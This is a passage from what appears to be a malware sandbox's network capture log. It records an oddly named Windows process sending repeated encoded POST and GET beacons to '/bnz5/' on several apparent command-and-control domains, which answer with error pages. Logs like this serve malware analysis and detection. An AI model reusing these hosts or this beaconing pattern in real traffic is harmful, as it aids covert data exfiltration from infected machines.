                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 49762 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:02:32.247059107 CEST | 1746 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.myspinpods.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.myspinpods.com
                                                                                                      Referer: http://www.myspinpods.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:02:32.458324909 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:02:32 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 49763 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:02:34.981544018 CEST | 450 | OUT | GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=dFo211Ya6GQqvQphJd5Z9kXpbZuBKAdHlLq9NOD/jOOiJZxFh2qZdwUu6l5GM/Gcb7yTWO1JQ6ZPaNdZMdh+co6vneivRci+mW27rS4RiRuWVEkpVXbIIudDxuuJlDWajg== HTTP/1.1
                                                                                                      Host: www.myspinpods.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:02:35.193644047 CEST | 107 | IN | HTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 10:02:35 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 49764 | 66.96.162.136 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:02:40.512943029 CEST | 733 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.seatheskydesign.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.seatheskydesign.online
                                                                                                      Referer: http://www.seatheskydesign.online/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=3MAjzDJaw8lDHJ3SffeLT1Gz210n+IvTdSn44VwGIptBpBZsUr8vuilh6BhF1UdB7wxLL5DOFoQ7gVJ0VRqDe7qLfTHU3lA80fu/QN6XiuHYVneRvjsE70oQk5zLzJHi4+olDzf9mr2VDiTdUK09PByUBv71rKL0NuiUHKgbwgW52w432owa93CS5iecoQMIPH9KTHw=
Apr 16, 2024 12:02:40.665096998 CEST | 1087 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:02:40 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 867
                                                                                                      Connection: close
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Age: 0
                                                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 49765 | 66.96.162.136 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:02:43.166287899 CEST | 753 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.seatheskydesign.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.seatheskydesign.online
                                                                                                      Referer: http://www.seatheskydesign.online/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=3MAjzDJaw8lDGpHSMueLUVGwz10nl4vXdSb44QIWIaZBnBpsVuIviClh1hhExUd87wM2L7XOFoE7gXB0Vm2EfrqFUzHFq1A80fu/QMeuiufYV3uRuCsHzUoTsZzL3JHm4+p2D3/DmtqVDijdUb0+GBySOP67nqusEdCYAYJ7ngSY6mVdsK4yuXuqpxWr5gthVkt6NQny2fw7ZZPfqKXAL9KwfDBk
Apr 16, 2024 12:02:43.316370964 CEST | 1087 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:02:43 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 867
                                                                                                      Connection: close
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Age: 0
                                                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
47          192.168.2.5  49766        66.96.162.136   80                2940  C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp                            Bytes transferred  Direction  Data
Apr 16, 2024 12:02:45.822494984 CEST  1770               OUT        POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.seatheskydesign.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.seatheskydesign.online
                                                                                                      Referer: http://www.seatheskydesign.online/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:02:45.965756893 CEST  1087               IN         HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:02:45 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 867
                                                                                                      Connection: close
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Age: 0
                                                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
48          192.168.2.5  49767        66.96.162.136   80                2940  C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp                            Bytes transferred  Direction  Data
Apr 16, 2024 12:02:48.479162931 CEST  458                OUT        GET /bnz5/?gr=6OoDw3xNyuUxCb7SO8/wQWyB7gJcoYv4ZTaI1h51IYF+sVRVSOMOuR9r6Rx19mFv7TRZYpTQN5hhg3dhUB7GRpmcej2viG1w8/6TMbbBsdyRJnmf1CwT9GI+x7zG1LG56Q==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.seatheskydesign.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:02:48.632186890 CEST  1087               IN         HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:02:48 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 867
                                                                                                      Connection: close
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Age: 0
                                                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
49          192.168.2.5  49768        185.215.4.13    80                2940  C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp                            Bytes transferred  Direction  Data
Apr 16, 2024 12:02:54.276185989 CEST  706                OUT        POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.naglissere.ru
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.naglissere.ru
                                                                                                      Referer: http://www.naglissere.ru/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=ZOlCXrC4Co/OqfDkEWpLXfL9UF4e2suPCLuM5JQGhtVmA72HyuU7XsuVn59PaUy1Qu63Pbsa7muLRFFZ2SNrll/4toS51dlfoAOFtxh5yqW+QlIzzgEYkujRkTc0v/uoeaAREzgH2ojEwtl+m2fH8llyIf+ZcIfO1vjbssuiXUtBZiX+GF5gAxbVRzrdnp8IPc+Y9ks=
Apr 16, 2024 12:02:54.524749041 CEST  749                IN         HTTP/1.1 404 Not Found
                                                                                                      Server: ddos-guard
                                                                                                      Connection: close
                                                                                                      Set-Cookie: __ddg1_=7nERBm9qcGQS1BK4u13e; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:54 GMT
                                                                                                      Date: Tue, 16 Apr 2024 10:02:54 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 340
                                                                                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                      ETag: "154-56d5bbe607fc0"
                                                                                                      Accept-Ranges: bytes
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
50          192.168.2.5  49769        185.215.4.13    80                2940  C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp                            Bytes transferred  Direction  Data
Apr 16, 2024 12:02:56.919907093 CEST  726                OUT        POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.naglissere.ru
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.naglissere.ru
                                                                                                      Referer: http://www.naglissere.ru/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=ZOlCXrC4Co/Op8LkH3pLbvL+bl4e/MuLCLiM5IkWhfBmAZeHzs87UsuVzp9WeUy8Qu2/Pa8a7mKLRHNZxlR03F/64YS/rtlfoAOFtxdTyqe+QV4zhREHoOjS0jc0kfukeaA3E3hi2unEwsV+lirApVk5H/+MNaSR+c/soKjDXFQ+cU6UcnxITR3tBgjq2ZdhV/uojz4qgQogzzf9UuzjoztmTizQ
Apr 16, 2024 12:02:57.183358908 CEST  749                IN         HTTP/1.1 404 Not Found
                                                                                                      Server: ddos-guard
                                                                                                      Connection: close
                                                                                                      Set-Cookie: __ddg1_=kegewplNQENTSIE1Q7qY; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:56 GMT
                                                                                                      Date: Tue, 16 Apr 2024 10:02:55 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 340
                                                                                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                      ETag: "154-56d5bbe607fc0"
                                                                                                      Accept-Ranges: bytes
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port
51          192.168.2.5  49770        185.215.4.13    80
Timestamp                            Bytes transferred  Direction  Data
Apr 16, 2024 12:02:59.856980085 CEST  1743               OUT        POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.naglissere.ru
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.naglissere.ru
                                                                                                      Referer: http://www.naglissere.ru/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:03:00.126024961 CEST | 749 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: ddos-guard
                                                                                                      Connection: close
                                                                                                      Set-Cookie: __ddg1_=0uihN83ZkchmiEoJtwrf; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:02:59 GMT
                                                                                                      Date: Tue, 16 Apr 2024 10:02:58 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 340
                                                                                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                      ETag: "154-56d5bbe607fc0"
                                                                                                      Accept-Ranges: bytes
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                      52 | 192.168.2.5 | 49771 | 185.215.4.13 | 80
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:03:02.499505997 CEST | 449 | OUT | GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=UMNiUc6XIv/d2uC7IlFmdfXYbiB/0cGyF5nVzLNzjfRVEsK0zJlkeP+z5Z1MT37PYueGSacB+keqYnFu3S8ymlT8yqaJ/dNBtni0ghgK1oHFbUR/jwcWs7rz0kpYku2gKQ== HTTP/1.1
                                                                                                      Host: www.naglissere.ru
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:03:02.758929014 CEST | 727 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: ddos-guard
                                                                                                      Connection: close
                                                                                                      Set-Cookie: __ddg1_=FsLO3Xo3enk5xsnyCzPb; Domain=.naglissere.ru; HttpOnly; Path=/; Expires=Wed, 16-Apr-2025 10:03:02 GMT
                                                                                                      Date: Tue, 16 Apr 2024 10:03:01 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 340
                                                                                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                      ETag: "154-56d5bbe607fc0"
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                      53 | 192.168.2.5 | 49772 | 174.138.177.173 | 80
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:03:19.095400095 CEST | 454 | OUT | GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQSTC2T/c7HqqgmNNGpbvCRxrYpdpNw0fXnMi51aRJIBirrQ== HTTP/1.1
                                                                                                      Host: www.elysiangame.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:03:19.218647003 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 1251
                                                                                                      date: Tue, 16 Apr 2024 10:03:19 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) ins
                                                                                                      Apr 16, 2024 12:03:19.218692064 CEST | 218 | IN
                                                                                                      Data Ascii: et;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                      54 | 192.168.2.5 | 49773 | 91.195.240.117 | 80
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:03:24.433867931 CEST | 727 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=U5lbigM/lzYTqGWqKR9cPhlxEl2Uc5AmbFpe6342j1GnMNfuxvwJWkF+Ikkjfvg9RtAgkqOWnY5rhUT/ccvxPEb1W/UhU1qDH8+H7mMde8ZL26AQY0vthPq4jEd1DxcAWH44Urky1RkpDfLc311tneRNlr0zclZeY5NCh6kmjOOItgPOSRRWGhy6k6qIT1oNgQl9gXA=
                                                                                                      Apr 16, 2024 12:03:24.647996902 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:03:24 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                      55 | 192.168.2.5 | 49774 | 91.195.240.117 | 80
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:03:27.167047024 CEST | 747 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=U5lbigM/lzYT7SSqN2hcOBlydV2UFJAibFle62smjGunCI7uwuwJVkF+QUkmSPg2RtNVkuGWncRrhUj/fv3yNUbNDvUnLlqDH8+H7ikke8BL2JYQYWHun/q7qkd1RBcEWH4OUq5d1ScpDavc0k1sseRL4b1NRnxXRZZ+tchS6ICKl2ikIzZ+VBeC0pi/CFJk6z1N+AXRajJWOxHeV8vc19lQgpiG
                                                                                                      Apr 16, 2024 12:03:27.378807068 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:03:27 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
56 | 192.168.2.5 | 49775 | 91.195.240.117 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:03:29.901143074 CEST | 1764 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
